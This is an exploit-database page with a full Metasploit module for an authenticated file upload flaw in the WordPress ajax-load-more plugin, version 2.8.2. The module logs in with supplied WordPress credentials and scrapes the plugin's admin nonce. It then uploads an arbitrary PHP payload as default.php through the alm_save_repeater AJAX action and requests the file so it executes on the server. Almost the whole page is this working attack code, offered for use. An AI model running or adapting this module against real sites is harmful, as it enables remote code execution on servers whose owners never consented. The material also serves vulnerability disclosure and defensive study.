Wordpress ajax-load-more Authenticated Arbitrary2.8.2 File Upload Vulnerability

2015.11.19
Credit: 4TT4CK3R
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Exploit Title : Wordpress ajax-load-more Authenticated Arbitrary2.8.2 File Upload Vulnerability ~# : Exploit Author : 4TT4CK3R ~# : Date : 2015/11/19 ~# : Tested on : Kali linux , Mozilla firefox , Windows 8.1 ~# : Google Dork : No ~# : Version : 2.8.2 [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : This Exploit is a metasploit module that you need to Metasploit ~# : Website for download metasploit : http://www.metasploit.com/download [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Module : require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Plugin ajax-load-more Authenticated Arbitrary2.8.2 File Upload Vulnerability', 'Description' => %q{ one of WordPress plugins called ajax-load-more Authenticated Arbitrary have File Uploading vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ '4TT4CK3R <MyGmail[A]gmail[.]com', ], 'References' => [ ['WPVDB', '8209'] ], 'DisclosureDate' => 'Oct 02 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ajax-load-more', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('WP_USER', [true, 'A valid wordpress username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class) end def user datastore['WP_USER'] end def password datastore['WP_PASSWORD'] end def check # Checking version of plugi ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2') if ver return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit # Wordpress login print_status("#{peer} - Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? print_error("#{peer} - Unable to login as #{user}") return end url = normalize_uri(wordpress_url_backend, 'profile.php') print_status("#{peer} - Retrieving WP nonce from #{url}") res = send_request_cgi({ 'method' => 'GET', 'uri' => url, 'cookie' => cookie }) if res and res.code == 200 # "alm_admin_nonce":"e58b6d536d" res.body =~ /"alm_admin_nonce":"([0-9a-f]+)"/ wp_nonce = $1 if wp_nonce print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}") else vprint_error("#{peer} #{res.body}") fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.") end else fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.") end print_status("#{peer} - Trying for upalod payload") # Generate MIME message data = Rex::MIME::Message.new data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"') data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"') data.add_part('default', nil, nil, 'form-data; name="type"') data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"') data.add_part(payload.encoded, nil, nil, 'form-data; name="value"') print_status("#{peer} - Uploading ...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_admin_ajax), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => cookie }) filename = 'default.php' if res if res.code == 200 lines = res.body.split("\n") if lines.length > 0 message = lines[lines.length - 1] if message.include?('Saved Successfully') register_files_for_cleanup(filename) else vprint_error("#{peer} - Unexpected web page content : #{message}") end else fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response") end else fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) end end [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Discovered by : 4TT4CK3R ~# : This exploit discoverd 2 month ago but today registered !!! ~# : Special thanks for : Sina Sadrifar , Atefe Mohammadlou , Mahdieh Saboor , Raziyeh Zeinali !!! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top